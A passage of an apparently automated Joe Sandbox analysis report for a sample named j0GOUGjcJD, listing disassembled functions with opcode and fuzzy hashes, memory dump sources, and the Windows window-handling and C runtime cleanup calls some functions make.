                • Instruction Fuzzy Hash: A012F4B17047468FC728CF29C99067AB3E0FF65309F10892EE597C7A81D378A895CB49
                Function 004DBE13 Relevance: .4, Instructions: 449COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c671897b802e2dd07e29af3d9bea970cc95026e7e439b124a6ac54092476bf9a
                • Instruction ID: a64ea235bfb2eeec744fdc692d060c4a0ebc32df1116398697b9d5f8c9a03fbe
                • Opcode Fuzzy Hash: c671897b802e2dd07e29af3d9bea970cc95026e7e439b124a6ac54092476bf9a
                • Instruction Fuzzy Hash: D1F17B716083028FC718CE29C5E496BBBE5EFC9314F148A2FF59597351D638E906CB8A
                Function 004F0B43 Relevance: .3, Instructions: 345COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: ccd1f4ba7fdabb831832b52b2c21344d799f6ce3d359b7ddebe7fca17cf2649c
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: DFC1A2362150970ADF2D4679853403FBAE19AE27B131A079FD5B3CB2C6FF28D524DA24
                Function 004F0F78 Relevance: .3, Instructions: 341COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: 0c579e723de770f6b69eb0faee8a3023ce0360d66fa3b945487dd507cc217fa8
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: 1DC1F3362050974ADF2D467AC53003FBAE15AA27B130A03AFD5B2CB2D5FF28D524DA24
                Function 004F070E Relevance: .3, Instructions: 331COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: 54422cc3886c0e571dedee90dc4b016f71d23f9feb21545aec2ee7bca3143874
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 1CC1B2362051970ADF2D4639853443FBAE15AE27B131A03AFD5B3CB2C6FF28D524DA24
                Function 004E6646 Relevance: .3, Instructions: 325COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 10351602873359d00d8c9fcb1b57d88c1137dea92eb76fd3af66d33f52345f8a
                • Instruction ID: 0be09fd37a12177da11f4e8f3041ab357ea264d16ceb67f781e0c4db8e0bd532
                • Opcode Fuzzy Hash: 10351602873359d00d8c9fcb1b57d88c1137dea92eb76fd3af66d33f52345f8a
                • Instruction Fuzzy Hash: 96D12BB1A043818FCB14DF2AC88075BBBE0BF65349F05456EE8449B342D738E959CB9E
                Function 004F02F6 Relevance: .3, Instructions: 323COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: d641020ef3558d7f7e9bd55d24654c251b411e49123f386be5b01ecca5e70b51
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 13C1A3362051570ADF2D8639853403FBAE15AE17B131A17AFD9B3CB2C6FF28D524DA24
                Function 004DE2A0 Relevance: .3, Instructions: 318COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6f7c8dfab54f4a0e1c75a949e3bf02269307e6b1296d2ed40904fc382ad13fb3
                • Instruction ID: 2e57ca8e3819431de49210d171e2b2492bc981974da4fea16edd05ecf10600bb
                • Opcode Fuzzy Hash: 6f7c8dfab54f4a0e1c75a949e3bf02269307e6b1296d2ed40904fc382ad13fb3
                • Instruction Fuzzy Hash: F3E137745183848FC304CF6AD8A09AABBF0BF9A300F85495EF5D587352D335EA19DB62
                Function 004E3A3C Relevance: .3, Instructions: 263COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction ID: ce0dd72c7ce695cd116c5e09bd3c68e9d1eed5e05cbdaaa1f26ccdaf2c5850b8
                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction Fuzzy Hash: B8917C712047858BD725EF66C898BBA73D5AF80306F10092FE59787382DA7CE745C34A
                Function 004F4969 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 489062f75788e47d001e0213acc13907d668a2fbb40cc9a061ed27fd6d330a86
                • Instruction ID: a18c2f89e12fb71bbbdd8e2caf96ddfd5e1dbc07751bdc88c02b581186caa890
                • Opcode Fuzzy Hash: 489062f75788e47d001e0213acc13907d668a2fbb40cc9a061ed27fd6d330a86
                • Instruction Fuzzy Hash: 046146B1B8060D56DA3489399855FBF2394DBC1304F140A1FE782DB382DE9DEE42875E
                Function 004E3D6D Relevance: .2, Instructions: 232COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction ID: 3351093e8391394a9c00e3832aa2514f9b30d58e2a84f8d4c1cff8df27b8fb3d
                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction Fuzzy Hash: 857140707043C54BDB25DE2AC8D8B6E77E09B9130BF00092FE58687382DA7CDA85875E
                Function 004F473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction ID: f670db05e8f994b36bbc7eb4c4a2fdf33adf76b1dafa059ca7ef2c1e98ed0a75
                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction Fuzzy Hash: 9951387560068C56DB3479688855BBF67C99BD3394F28050BDB82D7382DF0DDE42839E
                Function 004DDE6C Relevance: .2, Instructions: 190COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a35e7adce06e08ef698c26d317750609a1cd5fa430d8b692c75e486cfe404af5
                • Instruction ID: 0a743bd63cae9f452a09c86a6734c00c35a1bbbfdbb6e06d7664852cc8d4b6a8
                • Opcode Fuzzy Hash: a35e7adce06e08ef698c26d317750609a1cd5fa430d8b692c75e486cfe404af5
                • Instruction Fuzzy Hash: 35819F9121E6E8AEC7069F7D38F42F53FA15777300B1988ABC4C686363D13A465CE722
                Function 004DE8A0 Relevance: .2, Instructions: 154COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: cbe8e4e576fa38d226be095172567abeccb09db77ad412ffb8742c3b72e1474f
                • Instruction ID: 044e1f7837bf82f6521c27de8842aaec66b0875243d14f52331031848be5f5b2
                • Opcode Fuzzy Hash: cbe8e4e576fa38d226be095172567abeccb09db77ad412ffb8742c3b72e1474f
                • Instruction Fuzzy Hash: A251D0705093D24FC712EF2691A44AFBFE0BE9A318F59489FE4D54B303D224D64ACB96
                Function 004DF968 Relevance: .1, Instructions: 131COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7b3ad8225e74179b075b18f8a4fae7f3fcc2062d6fa10d876ab3429995f74cca
                • Instruction ID: f1df1ee0eaa12db20463e28ce205114fa20bdbb935262f5df87b1f45dd1af3e2
                • Opcode Fuzzy Hash: 7b3ad8225e74179b075b18f8a4fae7f3fcc2062d6fa10d876ab3429995f74cca
                • Instruction Fuzzy Hash: A0512671A083018FC748CF19D49055AF7E1FF88354F058A2EE899A7740DB34E959CB9A
                Function 004E37C1 Relevance: .1, Instructions: 112COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: e48585389b504e8514fab628f63b3142bcdaaa6fab636a14fef914cc6be60b60
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: A131D3B16047468FCB14DF29C86126BBBE0FB95306F10492FE495C7342C739EA59CB96
                Function 004D5F3C Relevance: .1, Instructions: 76COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dbfd12ce1f23c964d972f646fe384a98a38d76e00fa2fb74ac412ea7d413a859
                • Instruction ID: 90a211209957efabb4428f530132de3ca20d145496361b93c9d98ec4602f2821
                • Opcode Fuzzy Hash: dbfd12ce1f23c964d972f646fe384a98a38d76e00fa2fb74ac412ea7d413a859
                • Instruction Fuzzy Hash: BC212932A201254BCB48CF2DDCE087B7755A79A311746812FFE42CB3D1C538E928DBA0
                Function 004DDA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                Download Yara Rule
                APIs
                • _swprintf.LIBCMT ref: 004DDABE
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                  • Part of subcall function 004E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00510EE8,00000200,004DD202,00000000,?,00000050,00510EE8), ref: 004E15B3
                • _strlen.LIBCMT ref: 004DDADF
                • SetDlgItemTextW.USER32(?,0050E154,?), ref: 004DDB3F
                • GetWindowRect.USER32(?,?), ref: 004DDB79
                • GetClientRect.USER32(?,?), ref: 004DDB85
                • GetWindowLongW.USER32(?,000000F0), ref: 004DDC25
                • GetWindowRect.USER32(?,?), ref: 004DDC52
                • SetWindowTextW.USER32(?,?), ref: 004DDC95
                • GetSystemMetrics.USER32(00000008), ref: 004DDC9D
                • GetWindow.USER32(?,00000005), ref: 004DDCA8
                • GetWindowRect.USER32(00000000,?), ref: 004DDCD5
                • GetWindow.USER32(00000000,00000002), ref: 004DDD47
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$TP$d
                • API String ID: 2407758923-2858895526
                • Opcode ID: 5c343f80bdf16e8a99c88a135ff3c22eee20b2597fa7e113bde0eb11c8aaf14f
                • Instruction ID: be8739a680a026bd56ba920f92d0f91528867dc0f74e89264471c3538475d8ad
                • Opcode Fuzzy Hash: 5c343f80bdf16e8a99c88a135ff3c22eee20b2597fa7e113bde0eb11c8aaf14f
                • Instruction Fuzzy Hash: BF819071508301AFD710DFA9CD89A6FBBE9EB89704F04091EFA8493390D674E909CB56
                Function 004FC233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___free_lconv_mon.LIBCMT ref: 004FC277
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE2F
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE41
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE53
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE65
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE77
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE89
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBE9B
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEAD
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEBF
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBED1
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEE3
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBEF5
                  • Part of subcall function 004FBE12: _free.LIBCMT ref: 004FBF07
                • _free.LIBCMT ref: 004FC26C
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FC28E
                • _free.LIBCMT ref: 004FC2A3
                • _free.LIBCMT ref: 004FC2AE
                • _free.LIBCMT ref: 004FC2D0
                • _free.LIBCMT ref: 004FC2E3
                • _free.LIBCMT ref: 004FC2F1
                • _free.LIBCMT ref: 004FC2FC
                • _free.LIBCMT ref: 004FC334
                • _free.LIBCMT ref: 004FC33B
                • _free.LIBCMT ref: 004FC358
                • _free.LIBCMT ref: 004FC370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: PP
                • API String ID: 161543041-2217693588
                • Opcode ID: f39f353c830af9af339ef0975faeafcd6c64b238321763be7c6ca8be71a1587b
                • Instruction ID: b2f8f6cb7e12def4f1a036bc28d199517a728979e685d1e2b1254b5fcddaacd8
                • Opcode Fuzzy Hash: f39f353c830af9af339ef0975faeafcd6c64b238321763be7c6ca8be71a1587b
